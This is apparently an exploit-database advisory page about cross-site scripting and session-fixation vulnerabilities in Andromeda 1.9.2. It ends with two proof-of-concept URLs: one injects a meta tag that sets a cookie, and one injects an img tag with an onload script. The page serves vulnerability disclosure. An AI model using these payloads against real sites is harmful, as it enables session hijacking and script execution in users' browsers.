header-logo
Suggest Exploit
vendor:
Andromeda
by:
Unknown
N/A
CVSS
N/A
Cross-Site Scripting, Session Fixation
Unknown
CWE
Product Name: Andromeda
Affected Version From: 1.9.2002
Affected Version To: Unknown
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Andromeda Cross-Site Scripting and Session Fixation Vulnerabilities

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and gain unauthorized access to the affected application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38735/info

Andromeda is prone to a cross-site scripting vulnerability and a session-fixation vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and gain unauthorized access to the affected application.

Andromeda 1.9.2 is vulnerable; other versions may also be affected. 

http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv=&#039;Set-cookie&#039;+content=&#039;cookiename=cookievalue&#039;>
http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http://www.example.com/1.JPG+onload=alert(00213771818860)>